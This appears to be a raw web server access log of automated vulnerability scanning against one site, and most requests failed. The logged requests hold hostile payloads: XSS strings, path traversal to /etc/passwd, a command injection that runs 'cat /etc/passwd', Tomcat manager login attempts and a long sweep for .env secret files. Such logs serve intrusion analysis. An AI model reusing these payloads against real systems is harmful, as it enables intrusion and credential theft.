107.189.31.184 - - [18/Jun/2023:19:23:48 +0530] "GET /wp-content/plugins/marmoset-viewer/mviewer.php?id=1+http://a.com%27);alert(/2RHou4JSTUQpdd5LIMQpvtEVmC3/);marmoset.embed(%27a HTTP/1.1" 404 1086
107.189.31.184 - - [18/Jun/2023:19:24:29 +0530] "GET /index.php?s=example HTTP/1.1" 404 1012
107.189.31.184 - - [18/Jun/2023:19:24:29 +0530] "GET /index.php?s=example HTTP/1.1" 404 1012
41.186.73.134 - - [18/Jun/2023:19:24:50 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [18/Jun/2023:19:25:56 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [18/Jun/2023:19:26:40 +0530] "GET /../../etc/passwd HTTP/1.1" 400 -
107.189.31.184 - - [18/Jun/2023:19:26:41 +0530] "GET /../../etc/passwd HTTP/1.1" 400 -
107.189.31.184 - - [18/Jun/2023:19:28:37 +0530] "GET /?author=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 200 11250
107.189.31.184 - - [18/Jun/2023:19:28:38 +0530] "GET /?author=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 200 11250
41.186.73.134 - - [18/Jun/2023:19:29:06 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [18/Jun/2023:19:29:27 +0530] "GET /WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID&WEBACCOUNTPASSWORD HTTP/1.1" 404 1022
107.189.31.184 - - [18/Jun/2023:19:29:27 +0530] "GET /WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID&WEBACCOUNTPASSWORD HTTP/1.1" 404 1022
41.186.73.134 - - [18/Jun/2023:19:30:09 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [18/Jun/2023:19:30:39 +0530] "GET /php/device_graph_page.php?graph=%22zlo%20onerror=alert(1)%20%22 HTTP/1.1" 404 1044
107.189.31.184 - - [18/Jun/2023:19:30:39 +0530] "GET /php/device_graph_page.php?graph=%22zlo%20onerror=alert(1)%20%22 HTTP/1.1" 404 1044
90.151.171.106 - - [18/Jun/2023:19:31:26 +0530] "CONNECT v4.ident.me:443 HTTP/1.1" 400 -
90.151.171.106 - - [18/Jun/2023:19:31:26 +0530] "CONNECT check.best-proxies.ru:443 HTTP/1.1" 400 -
90.151.171.106 - - [18/Jun/2023:19:31:26 +0530] "-" 400 -
90.151.171.106 - - [18/Jun/2023:19:31:26 +0530] "-" 400 -
90.151.171.106 - - [18/Jun/2023:19:31:31 +0530] "GET /ip.php?Z78909657371Q1 HTTP/1.1" 404 1006
90.151.171.106 - - [18/Jun/2023:19:31:31 +0530] "GET /?Z70629657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [18/Jun/2023:19:31:31 +0530] "-" 400 -
90.151.171.106 - - [18/Jun/2023:19:31:31 +0530] "-" 400 -
41.186.73.134 - - [18/Jun/2023:19:33:21 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [18/Jun/2023:19:33:33 +0530] "GET /php/device_graph_page.php?device_id=%22zlo%20onerror=alert(1)%20%22 HTTP/1.1" 404 1044
107.189.31.184 - - [18/Jun/2023:19:33:35 +0530] "GET /php/device_graph_page.php?device_id=%22zlo%20onerror=alert(1)%20%22 HTTP/1.1" 404 1044
41.186.73.134 - - [18/Jun/2023:19:34:27 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [18/Jun/2023:19:36:51 +0530] "GET /cgi-bin/printenv HTTP/1.1" 404 1026
107.189.31.184 - - [18/Jun/2023:19:36:51 +0530] "GET /cgi-bin/printenv HTTP/1.1" 404 1026
41.186.73.134 - - [18/Jun/2023:19:37:46 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [18/Jun/2023:19:38:52 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [18/Jun/2023:19:40:17 +0530] "GET /OA_HTML/bin/sqlnet.log HTTP/1.1" 404 1038
107.189.31.184 - - [18/Jun/2023:19:40:17 +0530] "GET /OA_HTML/bin/sqlnet.log HTTP/1.1" 404 1038
107.189.31.184 - - [18/Jun/2023:19:41:46 +0530] "GET /_users/_all_docs HTTP/1.1" 404 1026
107.189.31.184 - - [18/Jun/2023:19:41:46 +0530] "GET /_users/_all_docs HTTP/1.1" 404 1026
41.186.73.134 - - [18/Jun/2023:19:42:04 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [18/Jun/2023:19:42:20 +0530] "GET /wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 404 1120
107.189.31.184 - - [18/Jun/2023:19:42:20 +0530] "GET /wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 404 1120
41.186.73.134 - - [18/Jun/2023:19:43:07 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [18/Jun/2023:19:43:30 +0530] "POST /run HTTP/1.1" 404 1000
107.189.31.184 - - [18/Jun/2023:19:43:31 +0530] "POST /run HTTP/1.1" 404 1000
107.189.31.184 - - [18/Jun/2023:19:44:18 +0530] "GET /cgi-bin/weblogin.cgi?username=admin';cat+/etc/passwd HTTP/1.1" 404 1034
107.189.31.184 - - [18/Jun/2023:19:44:19 +0530] "GET /cgi-bin/weblogin.cgi?username=admin';cat+/etc/passwd HTTP/1.1" 404 1034
107.189.31.184 - - [18/Jun/2023:19:44:40 +0530] "POST /install.php?page=4 HTTP/1.1" 404 1016
107.189.31.184 - - [18/Jun/2023:19:44:40 +0530] "POST /install.php?page=4 HTTP/1.1" 404 1016
107.189.31.184 - - [18/Jun/2023:19:45:29 +0530] "GET /fmangersub?cpath=../../../../../../../etc/passwd HTTP/1.1" 404 1014
107.189.31.184 - - [18/Jun/2023:19:45:30 +0530] "GET /fmangersub?cpath=../../../../../../../etc/passwd HTTP/1.1" 404 1014
41.186.73.134 - - [18/Jun/2023:19:46:19 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [18/Jun/2023:19:47:23 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [18/Jun/2023:19:48:09 +0530] "GET /kvmlm2/index.dhtml?fname&language=../../../../../../../../../../etc/passwd%00.jpg&lname&sponsor=gdi&template=11 HTTP/1.1" 404 1030
107.189.31.184 - - [18/Jun/2023:19:48:10 +0530] "GET /kvmlm2/index.dhtml?fname&language=../../../../../../../../../../etc/passwd%00.jpg&lname&sponsor=gdi&template=11 HTTP/1.1" 404 1030
107.189.31.184 - - [18/Jun/2023:19:48:35 +0530] "POST /api/v1/user/login HTTP/1.1" 404 1028
107.189.31.184 - - [18/Jun/2023:19:48:35 +0530] "POST /api/v1/user/login HTTP/1.1" 404 1028
107.189.31.184 - - [18/Jun/2023:19:50:05 +0530] "GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_zimbcore HTTP/1.1" 404 1012
107.189.31.184 - - [18/Jun/2023:19:50:08 +0530] "GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_zimbcore HTTP/1.1" 404 1012
107.189.31.184 - - [18/Jun/2023:19:50:25 +0530] "GET /mobile/error-not-supported-platform.html?desktop_url=javascript:alert(1337);//itms:// HTTP/1.1" 404 1074
107.189.31.184 - - [18/Jun/2023:19:50:26 +0530] "GET /mobile/error-not-supported-platform.html?desktop_url=javascript:alert(1337);//itms:// HTTP/1.1" 404 1074
107.189.31.184 - - [18/Jun/2023:19:50:37 +0530] "POST /imc/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1" 404 1106
107.189.31.184 - - [18/Jun/2023:19:50:38 +0530] "POST /imc/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1" 404 1106
107.189.31.184 - - [18/Jun/2023:19:50:40 +0530] "POST /imc/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1" 404 1106
107.189.31.184 - - [18/Jun/2023:19:50:40 +0530] "POST /imc/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1" 404 1106
41.186.73.134 - - [18/Jun/2023:19:50:41 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [18/Jun/2023:19:51:04 +0530] "GET /?key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss%27%29%3E HTTP/1.1" 200 11250
107.189.31.184 - - [18/Jun/2023:19:51:10 +0530] "GET /?key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss%27%29%3E HTTP/1.1" 200 11250
41.186.73.134 - - [18/Jun/2023:19:51:47 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [18/Jun/2023:19:53:00 +0530] "POST /cgi-bin/mt/mt-xmlrpc.cgi HTTP/1.1" 404 1042
107.189.31.184 - - [18/Jun/2023:19:53:01 +0530] "POST /cgi-bin/mt/mt-xmlrpc.cgi HTTP/1.1" 404 1042
41.186.73.134 - - [18/Jun/2023:19:54:56 +0530] "GET /manager/html HTTP/1.1" 401 2473
80.82.70.228 - - [18/Jun/2023:19:55:06 +0530] "-" 400 -
5.8.10.202 - - [18/Jun/2023:19:55:55 +0530] "GET / HTTP/1.1" 200 11250
41.186.73.134 - - [18/Jun/2023:19:56:00 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [18/Jun/2023:19:56:11 +0530] "POST /seo/seopanel/login.php?sec=forgot HTTP/1.1" 404 1038
107.189.31.184 - - [18/Jun/2023:19:56:11 +0530] "POST /seo/seopanel/login.php?sec=forgot HTTP/1.1" 404 1038
107.189.31.184 - - [18/Jun/2023:19:56:23 +0530] "GET /%20../web-inf/ HTTP/1.1" 404 1022
107.189.31.184 - - [18/Jun/2023:19:56:25 +0530] "GET /%20../web-inf/ HTTP/1.1" 404 1022
107.189.31.184 - - [18/Jun/2023:19:56:58 +0530] "GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_rokdownloads HTTP/1.1" 404 1012
107.189.31.184 - - [18/Jun/2023:19:57:01 +0530] "GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_rokdownloads HTTP/1.1" 404 1012
107.189.31.184 - - [18/Jun/2023:19:58:14 +0530] "POST /wp-json/am-member/license HTTP/1.1" 404 1044
107.189.31.184 - - [18/Jun/2023:19:58:15 +0530] "POST /wp-json/am-member/license HTTP/1.1" 404 1044
41.186.73.134 - - [18/Jun/2023:19:59:16 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [18/Jun/2023:20:00:20 +0530] "GET /config/initializers/secret_token.rb HTTP/1.1" 404 1064
107.189.31.184 - - [18/Jun/2023:20:00:21 +0530] "GET /config/initializers/secret_token.rb HTTP/1.1" 404 1064
41.186.73.134 - - [18/Jun/2023:20:00:22 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [18/Jun/2023:20:02:46 +0530] "GET /index.php?id=../../Conf/config.php&s=Admin-Data-down HTTP/1.1" 404 1012
107.189.31.184 - - [18/Jun/2023:20:02:46 +0530] "GET /index.php?id=../../Conf/config.php&s=Admin-Data-down HTTP/1.1" 404 1012
41.186.73.134 - - [18/Jun/2023:20:03:44 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [18/Jun/2023:20:04:51 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [18/Jun/2023:20:06:41 +0530] "GET /WebReport/ReportServer?cmd=get_geo_json&op=chart&resourcepath=privilege.xml HTTP/1.1" 404 1038
107.189.31.184 - - [18/Jun/2023:20:06:44 +0530] "GET /WebReport/ReportServer?cmd=get_geo_json&op=chart&resourcepath=privilege.xml HTTP/1.1" 404 1038
107.189.31.184 - - [18/Jun/2023:20:06:44 +0530] "GET /report/ReportServer?cmd=get_geo_json&op=chart&resourcepath=privilege.xml HTTP/1.1" 404 1032
107.189.31.184 - - [18/Jun/2023:20:06:46 +0530] "GET /report/ReportServer?cmd=get_geo_json&op=chart&resourcepath=privilege.xml HTTP/1.1" 404 1032
90.151.171.108 - - [18/Jun/2023:20:07:02 +0530] "CONNECT checkip.amazonaws.com:443 HTTP/1.1" 400 -
90.151.171.108 - - [18/Jun/2023:20:07:02 +0530] "CONNECT ip.bablosoft.com:443 HTTP/1.1" 400 -
90.151.171.108 - - [18/Jun/2023:20:07:07 +0530] "-" 400 -
90.151.171.108 - - [18/Jun/2023:20:07:07 +0530] "-" 400 -
90.151.171.108 - - [18/Jun/2023:20:07:12 +0530] "GET /?Z70629657371Q1 HTTP/1.1" 200 11250
90.151.171.108 - - [18/Jun/2023:20:07:12 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
90.151.171.108 - - [18/Jun/2023:20:07:17 +0530] "-" 400 -
90.151.171.108 - - [18/Jun/2023:20:07:17 +0530] "-" 400 -
107.189.31.184 - - [18/Jun/2023:20:07:19 +0530] "GET /cgit/cgit.cgi/git/objects/?path=../../../../../../../etc/passwd HTTP/1.1" 404 1046
107.189.31.184 - - [18/Jun/2023:20:07:19 +0530] "GET /cgit/cgit.cgi/git/objects/?path=../../../../../../../etc/passwd HTTP/1.1" 404 1046
41.186.73.134 - - [18/Jun/2023:20:08:03 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [18/Jun/2023:20:09:05 +0530] "POST /alerts/alertConfigField.php HTTP/1.1" 404 1048
107.189.31.184 - - [18/Jun/2023:20:09:05 +0530] "POST /alerts/alertConfigField.php HTTP/1.1" 404 1048
41.186.73.134 - - [18/Jun/2023:20:09:07 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [18/Jun/2023:20:11:08 +0530] "GET /.axiom/accounts/do.json HTTP/1.1" 404 1040
107.189.31.184 - - [18/Jun/2023:20:11:09 +0530] "GET /.axiom/accounts/do.json HTTP/1.1" 404 1040
41.186.73.134 - - [18/Jun/2023:20:12:19 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [18/Jun/2023:20:13:23 +0530] "GET /manager/html HTTP/1.1" 401 2473
89.248.171.23 - - [18/Jun/2023:20:13:29 +0530] "-" 400 -
89.248.171.23 - - [18/Jun/2023:20:13:29 +0530] "-" 400 -
107.189.31.184 - - [18/Jun/2023:20:14:40 +0530] "GET /wp/wp-content/uploads/wpjobboard/ HTTP/1.1" 404 1060
107.189.31.184 - - [18/Jun/2023:20:14:41 +0530] "GET /wp/wp-content/uploads/wpjobboard/ HTTP/1.1" 404 1060
107.189.31.184 - - [18/Jun/2023:20:14:42 +0530] "GET /wp-content/uploads/wpjobboard/ HTTP/1.1" 404 1054
107.189.31.184 - - [18/Jun/2023:20:14:44 +0530] "GET /wp-content/uploads/wpjobboard/ HTTP/1.1" 404 1054
107.189.31.184 - - [18/Jun/2023:20:16:20 +0530] "GET / HTTP/1.1" 200 11250
107.189.31.184 - - [18/Jun/2023:20:16:20 +0530] "GET / HTTP/1.1" 200 11250
107.189.31.184 - - [18/Jun/2023:20:16:22 +0530] "GET /struts2-showcase/showcase.action HTTP/1.1" 404 1058
107.189.31.184 - - [18/Jun/2023:20:16:22 +0530] "GET /struts2-showcase/showcase.action HTTP/1.1" 404 1058
107.189.31.184 - - [18/Jun/2023:20:16:27 +0530] "GET /php/device_graph_page.php?is2sim=%22zlo%20onerror=alert(1)%20%22 HTTP/1.1" 404 1044
107.189.31.184 - - [18/Jun/2023:20:16:28 +0530] "GET /php/device_graph_page.php?is2sim=%22zlo%20onerror=alert(1)%20%22 HTTP/1.1" 404 1044
107.189.31.184 - - [18/Jun/2023:20:16:32 +0530] "GET /wps/portal/client/welcome/!ut/p/z1/04_Sj9CPykssy0xPLMnMz0vMAfIjo8ziHd3DQgMNnM3N_M1DjA08PX0NgoNcnQwt3Ez1wwkpiAJKG-AAjgb6BbmhigBypoQ7/dz/d5/L2dBISEvZ0FBIS9nQSEh/?uri=nm:oid:Z6_00000000000000A0BR2B300GG2 HTTP/1.1" 404 1312
107.189.31.184 - - [18/Jun/2023:20:16:34 +0530] "GET /wps/portal/!ut/p/z1/04_Sj9CPykssy0xPLMnMz0vMAfIjo8ziHd3DQgMNnM3N_M1DjA08PX0NgoNcnQwt3Ez1wwkpiAJKG-AAjgb6BbmhigBypoQ7/dz/d5/L2dBISEvZ0FBIS9nQSEh/?uri=nm:oid:Z6_00000000000000A0BR2B300GG2 HTTP/1.1" 404 1282
107.189.31.184 - - [18/Jun/2023:20:16:36 +0530] "GET /wps/portal/client/welcome/!ut/p/z1/04_Sj9CPykssy0xPLMnMz0vMAfIjo8ziHd3DQgMNnM3N_M1DjA08PX0NgoNcnQwt3Ez1wwkpiAJKG-AAjgb6BbmhigBypoQ7/dz/d5/L2dBISEvZ0FBIS9nQSEh/?uri=nm:oid:Z6_00000000000000A0BR2B300GG2 HTTP/1.1" 404 1312
107.189.31.184 - - [18/Jun/2023:20:16:36 +0530] "GET /wps/portal/!ut/p/z1/04_Sj9CPykssy0xPLMnMz0vMAfIjo8ziDVCAo4FTkJGTsYGBu7uRfjhYgaN7WGiggbO5mb95iLGBp6evQXCQq5OhhZupfhSGfmSToPrxWEBQfxRYSYCHh5mHoYWBj7-RL1DC1y3M2NXCx9jA3RiqAI8ZBbmhEQaZjooABQv7ag!!/dz/d5/L2dBISEvZ0FBIS9nQSEh/dz/d5/L0lJSkdKSUtVSklKQ2dwUkNncFJBL29Od3dBQUFZUUFBRUl3UWxDVTVBQUdNSUtTcEtGTFJ0R0ZvIS80TmxFTklVTVFuRmR1WXBNaFFUVWs1Q2ltcHBBL1o2XzAwMDAwMDAwMDAwMDAwQTBCUjJCMzAwR1YwL1o3XzAwMDAwMDAwMDAwMDAwQTBCUjJCMzAwSU8wL25vcm1hbC9PQ04vWjZfMDAwMDAwMDAwMDAwMDBBMEJSMkIzMDBHRzIvYW8vdGht/ HTTP/1.1" 404 1968
107.189.31.184 - - [18/Jun/2023:20:16:38 +0530] "GET /wps/portal/!ut/p/z1/04_Sj9CPykssy0xPLMnMz0vMAfIjo8ziHd3DQgMNnM3N_M1DjA08PX0NgoNcnQwt3Ez1wwkpiAJKG-AAjgb6BbmhigBypoQ7/dz/d5/L2dBISEvZ0FBIS9nQSEh/?uri=nm:oid:Z6_00000000000000A0BR2B300GG2 HTTP/1.1" 404 1282
107.189.31.184 - - [18/Jun/2023:20:16:38 +0530] "GET /wps/portal/!ut/p/z1/04_Sj9CPykssy0xPLMnMz0vMAfIjo8ziDVCAo4FTkJGTsYGBu7uRfjhYgaN7WGiggbO5mb95iLGBp6evQXCQq5OhhZupfhSGfmSToPrxWEBAf0FuaCgAb7VcBA!!/dz/d5/L2dBISEvZ0FBIS9nQSEh/dz/d5/L0lJSkdKSUtVSklKQ2dwUkNncFJBL29Od3dBQUFZUUFBRUl3UWxDVTVBQUdNSUtTcEtGTFJ0R0ZvIS80TmxFTklVTVFuRmR1WXBNaFFUVWs1Q2ltcHBBL1o2XzAwMDAwMDAwMDAwMDAwQTBCUjJCMzAwR1YwL1o3XzAwMDAwMDAwMDAwMDAwQTBCUjJCMzAwSU8wL25vcm1hbC9PQ04vWjZfMDAwMDAwMDAwMDAwMDBBMEJSMkIzMDBHRzIvYW8vdGht/ HTTP/1.1" 404 1872
107.189.31.184 - - [18/Jun/2023:20:16:41 +0530] "GET /wps/portal/!ut/p/z1/pZHBDoIwDIYfqZVF4DoIEg5KBEHWi9mBIAnbjCEefHqH8SARJNGe2qRf_78tEFRAWt7aRvat0bKztSD3hKPgGGROwBDjEuH4bOBxWewx9NzUOzBMki3mWRSs_M0a6IN_n_Ti5wRiZ4Kf0J9r8PEXfmTwL_0Sl_YXlvfm-CRFKLS5KvuJHAgoDXeL9wKSBkR_VkPa6QZEra1N-rrJcKglqxdV2KjuEVM-czP-AKyJL-g!/dz/d5/L2dBISEvZ0FBIS9nQSEh/ HTTP/1.1" 404 1562
107.189.31.184 - - [18/Jun/2023:20:16:41 +0530] "GET /wps/portal/!ut/p/z1/04_Sj9CPykssy0xPLMnMz0vMAfIjo8ziDVCAo4FTkJGTsYGBu7uRfjhYgaN7WGiggbO5mb95iLGBp6evQXCQq5OhhZupfhSGfmSToPrxWEBQfxRYSYCHh5mHoYWBj7-RL1DC1y3M2NXCx9jA3RiqAI8ZBbmhEQaZjooABQv7ag!!/dz/d5/L2dBISEvZ0FBIS9nQSEh/dz/d5/L0lJSkdKSUtVSklKQ2dwUkNncFJBL29Od3dBQUFZUUFBRUl3UWxDVTVBQUdNSUtTcEtGTFJ0R0ZvIS80TmxFTklVTVFuRmR1WXBNaFFUVWs1Q2ltcHBBL1o2XzAwMDAwMDAwMDAwMDAwQTBCUjJCMzAwR1YwL1o3XzAwMDAwMDAwMDAwMDAwQTBCUjJCMzAwSU8wL25vcm1hbC9PQ04vWjZfMDAwMDAwMDAwMDAwMDBBMEJSMkIzMDBHRzIvYW8vdGht/ HTTP/1.1" 404 1968
107.189.31.184 - - [18/Jun/2023:20:16:43 +0530] "GET /wps/portal/!ut/p/z1/04_Sj9CPykssy0xPLMnMz0vMAfIjo8ziDVCAo4FTkJGTsYGBu7uRfjhYgaN7WGiggbO5mb95iLGBp6evQXCQq5OhhZupfhSGfmSToPrxWEBAf0FuaCgAb7VcBA!!/dz/d5/L2dBISEvZ0FBIS9nQSEh/dz/d5/L0lJSkdKSUtVSklKQ2dwUkNncFJBL29Od3dBQUFZUUFBRUl3UWxDVTVBQUdNSUtTcEtGTFJ0R0ZvIS80TmxFTklVTVFuRmR1WXBNaFFUVWs1Q2ltcHBBL1o2XzAwMDAwMDAwMDAwMDAwQTBCUjJCMzAwR1YwL1o3XzAwMDAwMDAwMDAwMDAwQTBCUjJCMzAwSU8wL25vcm1hbC9PQ04vWjZfMDAwMDAwMDAwMDAwMDBBMEJSMkIzMDBHRzIvYW8vdGht/ HTTP/1.1" 404 1872
107.189.31.184 - - [18/Jun/2023:20:16:44 +0530] "GET /reports/rwservlet/showenv HTTP/1.1" 404 1044
41.186.73.134 - - [18/Jun/2023:20:16:44 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [18/Jun/2023:20:16:45 +0530] "GET /reports/rwservlet/showenv HTTP/1.1" 404 1044
107.189.31.184 - - [18/Jun/2023:20:16:46 +0530] "GET /wps/portal/!ut/p/z1/pZHBDoIwDIYfqZVF4DoIEg5KBEHWi9mBIAnbjCEefHqH8SARJNGe2qRf_78tEFRAWt7aRvat0bKztSD3hKPgGGROwBDjEuH4bOBxWewx9NzUOzBMki3mWRSs_M0a6IN_n_Ti5wRiZ4Kf0J9r8PEXfmTwL_0Sl_YXlvfm-CRFKLS5KvuJHAgoDXeL9wKSBkR_VkPa6QZEra1N-rrJcKglqxdV2KjuEVM-czP-AKyJL-g!/dz/d5/L2dBISEvZ0FBIS9nQSEh/ HTTP/1.1" 404 1562
107.189.31.184 - - [18/Jun/2023:20:16:46 +0530] "GET /reports/rwservlet?JOBTYPE=rwurl&URLPARAMETER=file:///&desformat=html&destype=cache&report=test.rdf HTTP/1.1" 404 1028
107.189.31.184 - - [18/Jun/2023:20:16:47 +0530] "GET /reports/rwservlet?JOBTYPE=rwurl&URLPARAMETER=file:///&desformat=html&destype=cache&report=test.rdf HTTP/1.1" 404 1028
41.186.73.134 - - [18/Jun/2023:20:17:51 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [18/Jun/2023:20:19:03 +0530] "POST /api/login HTTP/1.1" 404 1012
107.189.31.184 - - [18/Jun/2023:20:19:03 +0530] "POST /api/login HTTP/1.1" 404 1012
107.189.31.184 - - [18/Jun/2023:20:20:24 +0530] "GET /jsonapi/user/user HTTP/1.1" 404 1028
107.189.31.184 - - [18/Jun/2023:20:20:24 +0530] "GET /jsonapi/user/user HTTP/1.1" 404 1028
141.98.11.207 - - [18/Jun/2023:20:21:08 +0530] "GET / HTTP/1.1" 200 11250
41.186.73.134 - - [18/Jun/2023:20:21:08 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [18/Jun/2023:20:21:57 +0530] "GET /xmldata?item=CpqKey HTTP/1.1" 404 1008
107.189.31.184 - - [18/Jun/2023:20:21:57 +0530] "GET /xmldata?item=CpqKey HTTP/1.1" 404 1008
41.186.73.134 - - [18/Jun/2023:20:22:13 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.169.34.47 - - [18/Jun/2023:20:22:37 +0530] "CONNECT www.google.com:443 HTTP/1.1" 400 -
107.189.31.184 - - [18/Jun/2023:20:22:55 +0530] "GET /system/console?.css HTTP/1.1" 404 1022
107.189.31.184 - - [18/Jun/2023:20:22:56 +0530] "GET /system/console?.css HTTP/1.1" 404 1022
107.189.31.184 - - [18/Jun/2023:20:23:31 +0530] "GET /.env HTTP/1.1" 404 1002
107.189.31.184 - - [18/Jun/2023:20:23:33 +0530] "GET /.env.bak HTTP/1.1" 404 1010
107.189.31.184 - - [18/Jun/2023:20:23:35 +0530] "GET /.env.dev HTTP/1.1" 404 1010
107.189.31.184 - - [18/Jun/2023:20:23:37 +0530] "GET /.env.dev.local HTTP/1.1" 404 1022
107.189.31.184 - - [18/Jun/2023:20:23:39 +0530] "GET /.env.development.local HTTP/1.1" 404 1038
107.189.31.184 - - [18/Jun/2023:20:23:40 +0530] "GET /.env HTTP/1.1" 404 1002
107.189.31.184 - - [18/Jun/2023:20:23:42 +0530] "GET /.env.prod HTTP/1.1" 404 1012
107.189.31.184 - - [18/Jun/2023:20:23:43 +0530] "GET /.env.bak HTTP/1.1" 404 1010
107.189.31.184 - - [18/Jun/2023:20:23:44 +0530] "GET /.env.prod.local HTTP/1.1" 404 1024
107.189.31.184 - - [18/Jun/2023:20:23:46 +0530] "GET /.env.dev HTTP/1.1" 404 1010
107.189.31.184 - - [18/Jun/2023:20:23:46 +0530] "GET /.env.production HTTP/1.1" 404 1024
107.189.31.184 - - [18/Jun/2023:20:23:48 +0530] "GET /.env.dev.local HTTP/1.1" 404 1022
107.189.31.184 - - [18/Jun/2023:20:23:49 +0530] "GET /.env.production.local HTTP/1.1" 404 1036
107.189.31.184 - - [18/Jun/2023:20:23:50 +0530] "GET /.env.development.local HTTP/1.1" 404 1038
107.189.31.184 - - [18/Jun/2023:20:23:51 +0530] "GET /.env.local HTTP/1.1" 404 1014
107.189.31.184 - - [18/Jun/2023:20:23:52 +0530] "GET /.env.prod HTTP/1.1" 404 1012
107.189.31.184 - - [18/Jun/2023:20:23:53 +0530] "GET /.env.example HTTP/1.1" 404 1018
107.189.31.184 - - [18/Jun/2023:20:23:54 +0530] "GET null null" 400 -
107.189.31.184 - - [18/Jun/2023:20:23:54 +0530] "GET /.env.prod.local HTTP/1.1" 404 1024
107.189.31.184 - - [18/Jun/2023:20:23:55 +0530] "GET /.env.stage HTTP/1.1" 404 1014
107.189.31.184 - - [18/Jun/2023:20:23:55 +0530] "GET null null" 400 -
107.189.31.184 - - [18/Jun/2023:20:23:57 +0530] "GET /.env.live HTTP/1.1" 404 1012
107.189.31.184 - - [18/Jun/2023:20:23:57 +0530] "GET /.env.production HTTP/1.1" 404 1024
107.189.31.184 - - [18/Jun/2023:20:23:59 +0530] "GET /.env.backup HTTP/1.1" 404 1016
107.189.31.184 - - [18/Jun/2023:20:24:00 +0530] "GET /.env.production.local HTTP/1.1" 404 1036
107.189.31.184 - - [18/Jun/2023:20:24:02 +0530] "GET /.env.save HTTP/1.1" 404 1012
107.189.31.184 - - [18/Jun/2023:20:24:03 +0530] "GET /.env.local HTTP/1.1" 404 1014
107.189.31.184 - - [18/Jun/2023:20:24:05 +0530] "GET /.env.example HTTP/1.1" 404 1018
107.189.31.184 - - [18/Jun/2023:20:24:05 +0530] "GET /.env.old HTTP/1.1" 404 1010
107.189.31.184 - - [18/Jun/2023:20:24:08 +0530] "GET /.env.www HTTP/1.1" 404 1010
107.189.31.184 - - [18/Jun/2023:20:24:08 +0530] "GET /.env.stage HTTP/1.1" 404 1014
107.189.31.184 - - [18/Jun/2023:20:24:11 +0530] "GET /.env.live HTTP/1.1" 404 1012
107.189.31.184 - - [18/Jun/2023:20:24:11 +0530] "GET /.env_1 HTTP/1.1" 404 1006
107.189.31.184 - - [18/Jun/2023:20:24:14 +0530] "GET /.env_sample HTTP/1.1" 404 1016
107.189.31.184 - - [18/Jun/2023:20:24:14 +0530] "GET /.env.backup HTTP/1.1" 404 1016
107.189.31.184 - - [18/Jun/2023:20:24:17 +0530] "GET /.env.51 HTTP/1.1" 404 1008
107.189.31.184 - - [18/Jun/2023:20:24:17 +0530] "GET /.env.save HTTP/1.1" 404 1012
107.189.31.184 - - [18/Jun/2023:20:24:20 +0530] "GET /.env.103.145 HTTP/1.1" 404 1018
107.189.31.184 - - [18/Jun/2023:20:24:20 +0530] "GET /.env.old HTTP/1.1" 404 1010
107.189.31.184 - - [18/Jun/2023:20:24:23 +0530] "GET /api/.env HTTP/1.1" 404 1010
107.189.31.184 - - [18/Jun/2023:20:24:24 +0530] "GET /.env.www HTTP/1.1" 404 1010
107.189.31.184 - - [18/Jun/2023:20:24:27 +0530] "GET /.env_1 HTTP/1.1" 404 1006
